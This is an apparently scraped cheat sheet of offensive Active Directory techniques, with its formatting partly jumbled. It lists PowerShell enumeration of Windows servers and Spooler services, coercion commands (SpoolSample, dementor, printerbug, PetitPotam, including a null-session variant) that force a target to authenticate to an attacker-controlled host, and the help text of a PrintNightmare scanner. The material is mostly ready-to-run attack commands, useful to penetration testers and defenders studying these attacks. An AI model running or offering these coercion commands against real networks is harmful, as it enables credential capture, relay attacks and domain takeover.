# https://book.hacktricks.xyz/windows/active-directory-methodology/printers-spooler-service-abuse# Finding Windows Servers on the domain
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * |select Name | ft -HideTableHeaders > servers.txt
# Finding Spooler services listening # https://github.com/NotMedic/NetNTLMtoSilverTicket
ForEach ($server in Get-Content servers.txt){Get-SpoolStatus $server}# Or on Linux
MS-RPRN Abuse (Printer Bug)
# Ask the service to authenticate against an arbitrary host# Using SpoolSample (https://github.com/NotMedic/NetNTLMtoSilverTicket)
SpoolSample.exe <TARGET> <RESPONDERIP>
# Using printerbug or dementor
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
# Really great doc
# Can test the uid through MSF# scanner/smb/pipe_dcerpc_auditor# TODO# PoC tool to coerce Windows hosts to authenticate to other machines# via MS-EFSRPC EfsRpcOpenFileRaw function# Disabling the EFS service seems not to mitigate the "feature".
$ ./petitpotam.py -d domain.com -u myuser -p mypass <attacker_ip> <target>
# Seems possible to use NULL sessions on some domain controllers# TEST
$ ./petitpotam.py -d '' -u '' -p '' <attacker_ip> <target>
PrintNightmare (CVE-2021-34527)
# Python Scanner
usage: itwasalladream [-h] -u USERNAME [-p PASSWORD] -d DOMAIN [--timeout TIMEOUT][--threads THREADS][-v][--csv-column CSV_COLUMN] target
PrintNightmare (CVE-2021-34527) scanner
positional arguments:
target Target subnet in CIDR notation, CSV file or newline-delimited text file
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
username to authenticate as (default: None)
-p PASSWORD, --password PASSWORD
password to authenticate as. If not specified will prompt. (default: None)
-d DOMAIN, --domain DOMAIN
domain to authenticate as (default: None)
--timeout TIMEOUT Connection timeout in secods (default: 30)
--threads THREADS Max concurrent threads (default: 100)
-v, --verbose Enable verbose output (default: False)
--csv-column CSV_COLUMN
If target argument is a CSV file, this argument specifies which column to parse (default: DNSHostName)